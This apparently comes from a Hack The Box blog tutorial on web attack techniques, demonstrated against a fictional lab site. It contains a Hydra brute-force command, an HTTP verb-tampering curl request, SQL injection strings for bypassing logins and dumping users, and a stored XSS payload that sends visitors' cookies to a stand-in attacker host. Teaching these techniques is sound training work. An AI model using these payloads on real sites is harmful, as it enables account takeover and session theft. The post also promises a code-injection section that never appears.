

RED TEAMING 9 MIN READ

4 website hacking
techniques (try these
on your next pentest)
Four beginner-friendly website
hacking techniques to try on your
next pentest (with live “follow-along”
examples)!

g4rg4m3l, Aug 06 2024

Are you looking to learn how to protect the

web or just want a more in-depth

understanding of how attackers target web

applications?

This guide will explore five hacking

techniques, ranging from beginner to

advanced levels. We’ll cover:

• Login brute force

• HTTP verb tampering

• SQLi

• XSS

• Code injection leading to remote

code execution

Before we start, it's important that you

note the following “do not try this at

home" disclaimer:

These examples are for educational

and informative purposes only, and are

intended to provide insights into the

methods attackers use to compromise

website security.

If you want to try these techniques,

always practice in a safe, controlled

environment such as your local

computer or on the Hack The Box (HTB)

platform.

Now, let's rock and roll.

Login brute force

A brute force attack is a trial-and-error

approach to a certain feature or service. For

our example, we will focus on a web

application login. In this case, the application

requires a username and password to allow

access.

In this scenario, attackers can use a variety

of approaches. We will focus on

demonstrating what is known as a brute-

force dictionary attack.

A typical dictionary brute force attack uses

password lists, which are large text files

containing thousands of common passwords

gathered from years of data breaches.

To simulate our attack, we will use the

popular “rockyou.txt” wordlist. But there are

all kinds of reputable wordlists, such as the

SecLists project, which is maintained by

Daniel Miessler, Jason Haddix, and g0tmi1k.

We will conduct our attacks against the web

application of the evil "g4rg4m3l". Let's help

the Smurfs. Remember to always hack for

good!

A common username found in all kinds of

services and applications is "admin." So

that’s the account we’ll try to brute force.

First, we will check the admin username

against the password testing.

As expected, we get back an Invalid

username or password error message.

Now we’ll brute force the login with the user

admin and the rockyou.txt password list.

We’ll use the Hydra tool to perform this

attack from the command line. But, there are

plenty of tools that can perform this attack,

such as Burp Suite.

hydra -l admin -P

/usr/share/wordlists/rockyou.txt -f -

vV g4rg4m3l.htb http-post-form

"/login.php:username=^USER^&password=^

PASS^:Invalid username or password"

Use the:

• -l option to specify the username.

• -P for the password list.

• -f to stop hydra on the first

successful login.

• -vV to see a verbose output and the

string Invalid username or
password, which corresponds to
the unsuccessful login message.

As we can see, Hydra checked the

passwords one by one until it found the one

that corresponds to the user admin, which

was password123.

Go ahead and say the line: "We're in!"

This technique is considered suitable for

beginners because it requires minimal skills.

To conduct this attack, attackers only need a

basic understanding of how web

applications work and proficiency with brute

force tools like Hydra and Burp Suite.

Go deeper

Check out these HTB courses to learn more:

• Introduction to Web Applications.

• Login Brute Forcing.

HTML verb tampering

Attackers are always on the lookout for

indicators of poor security posture, such as

the password for the "g4rg4m3l" website

admin user.

These hints alert attackers that a certain web

application can be further exploited due to a

lack of security.

Upon further exploration, we come across

the "G4RG4M3L's Evil Plans" section of our

example website, where he lays out several

of his evil plans against the Smurfs.

Each plan includes a "Delete Plan" button.

Let's try to delete those evil plans.

It seems that despite his poor password

choices, g4rg4m3l has some sort of

protection against the deletion of his plans.

However, when we inspect these actions in

the browser developer tools, we notice that

the request is made using the DELETE HTTP

method.

HTTP Methods (also called verbs) specify

the type of actions a web server must

perform for a particular request.

By manipulating HTTP verbs, such as

changing DELETE to GET, an attacker can

tamper with the functionality of a web

application, leading to data manipulation and

deletion on the server.

For our HTTP tampering attack against

g4rg4m3l, we'll change the DELETE verb to

GET and send the same request using the

cURL command line tool.

curl -X GET -d

"evil_plan_id=666f1081b50c"

http://g4rg4m3l.htb/evil_plans.php

• The -X option is used to specify the

HTTP verb.

• We also need to identify the id of

the plan we want to test, which we
can obtain through HTML
inspection or by selecting COPY
DELETE DATA in the browser dev
tools.

After we refresh the page, it becomes

apparent that changing the HTTP verb led to

the first plan’s deletion.

By tampering with HTTP verbs attackers can

mess with the web application

functionalities with potentially catastrophic

consequences, such as deleting data.

Go deeper

Check out these HTB courses to learn more:

• Web Requests.

• Web Attacks.

To perform these attacks, you’ll need a clear

understanding of the HTTP protocol and how

web applications work, as well as tools like

browser developer tools and cURL.

SQL Injection
Let's revisit the login section. For a simple

authentication process, we can assume that

the username and its corresponding

password are stored in a database.

When the user enters their username and

password, a verification process occurs on

the backend to check if they exist in that

database.

Attackers can take advantage of this process

by inserting malicious Structured Query

Language (SQL) statements into web form

fields instead of the expected user input.

This type of attack, called SQL Injection, can

manipulate the database, potentially access

sensitive information, and even bypass

authentication.

When a password and username exist in the

database, an SQL statement will return true

and authenticate that particular user.

However, if the application does not properly

protect against these kinds of attacks, an

attacker can directly input an SQL statement

that always returns true, such as “OR

'1'=1”.

This means the statement will always return

true regardless of whether the username

and password match and can bypass the

authentication method.

These types of vulnerabilities can be further

exploited and potentially lead to data

exfiltration when the malicious code tricks

the database into exposing information.

For our example, we’ll use the UNION

SELECT id, username, password, email

FROM users – query to try and access

sensitive information on the database.

By injecting a UNION SELECT statement, we

can append our own query to the original

query, and potentially retrieve data from

other tables.

By injecting our crafted query, we were able

to retrieve information about the users

stored in the application database.

We can use these credentials to access

different user accounts in further attacks

against the website.

It’s important to note that attackers need to

follow several steps in order to create a

functioning SQL statement.

Note: The methods and techniques used

in these attacks can vary greatly based on

the specific configuration and design of each

database, due to the variety of ways

databases can be configured.

Go deeper

Check out these HTB courses to learn more:

In addition to the previously mentioned skills,

this website hacking technique requires

familiarity with web application

infrastructures, databases, and SQL.

• SQLMap Essentials.

• SQL Injection Fundamentals.

Cross-site scripting
(XSS) / cookie theft
Cross-site scripting (XSS) attacks are a type

of injection web hacking technique where an

attacker can insert malicious code into a

web application.

These attacks usually happen when an

application accepts user input without

proper validation.

Cross-site scripting allows malicious code to

be mixed with legitimate input. Ultimately

giving attackers access to sensitive

information, cookies, session tokens, and

even the ability to modify the content of the

web applications.

There are several kinds of XSS attacks. We

will focus on what's known as Stored XSS,

which can obtain cookies from unsuspecting

users.

Stored XSS is an attack where malicious

code is permanently injected into a target, or

“stored”, in the comment section of a blog, a

post, or a message.

When we access the comment section of our

target web application, we can input a

malicious script that begins with a <script>

tag.

This tag instructs the browser to run the

enclosed JavaScript code. The script looks

like this:

<script>var img = new Image();

img.src = 'http:/<attacker-

IPaddress>:666/steal-cookies.php?

cookie=' + document.cookie;</script>

Once executed, it creates a new image

object that prompts the browser to send a

GET request to a malicious URL.

When an unsuspecting visitor goes to the

page, their browser will interpret the HTML

and execute this code, which sends their

cookie to the attacker's URL.

With our XSS attack set, this is now a waiting

game, as we’re waiting for visitors to visit

g4rg4m3l’s page so we can get their cookies.

After a while, our attacker server captures a

cookie from one of g4rg4m3l’s visitors. We’ll

show you how to receive a connection back

to our machine in our next example.

Go deeper

Check out these HTB courses to learn more:

• Cross-Site Scripting (XSS).

• Introduction to Python 3.

To execute these attacks, you must have all

of the previously mentioned skills as well as

proficiency with programming languages like

Python, PHP, and Javascript.

When web applications fail to validate user

inputs, attackers can further exploit them to

execute arbitrary commands on the host

Operating System (OS) potentially

compromising the system entirely.

Become a certified
website hacking
specialist
We have covered some common techniques

for hacking websites from beginner to

advanced levels:

• Login brute force

• HTTP verb tampering

• SQLi

• XSS

• Code injection leading to remote

code execution

Bear in mind that we made these difficulty

classifications based on the varying levels of

knowledge in different areas that a web app

penetration tester must have.

The nature and complexity of web

applications make each one unique. So an

attack that we classified as "advanced" may

actually be relatively easy to perform, if the

web application has weak security. Similarly,

a “beginner” level attack against a very

secure website may be very complicated.

Understanding how attackers operate and

learning the different techniques they use is

crucial for protection and safety. We

encourage you to explore all of the

recommended modules and get hands-on

practice.

Consider choosing a Job Role Path on Hack

The Box Academy or cybersecurity

certification.

These resources will guide you through the

Academy modules, helping you develop

practical skills and the necessary mindset for

a particular job role, such as a pentester, web

app security expert, or SOC analyst.

Stay safe, be ethical, keep learning, and rock

n' roll!

Latest News

CYB E R TE AM S 7 MIN READ

Election security: how companies

and federal agencies can protect
the backbone of democracy

b3rt0ll0 & sebh24 , Sep 02, 2024

B LU E TE AM I N G 5 MIN READ

NTDS dumping attack detection

CyberJunkie & g4rg4m3l , Aug 29, 2024

N EWS 5 MIN READ

Powerful new perks for VIP/VIP+

members and why they will help
you accelerate your security
journey
JXoaT, Aug 22, 2024

The latest news and

updates, direct from Hack
The Box
Read More

Products


Solutions


Pricing


Resources


Company


Cookie Settings

Privacy Policy

User Agreement

© 2024 Hack The Box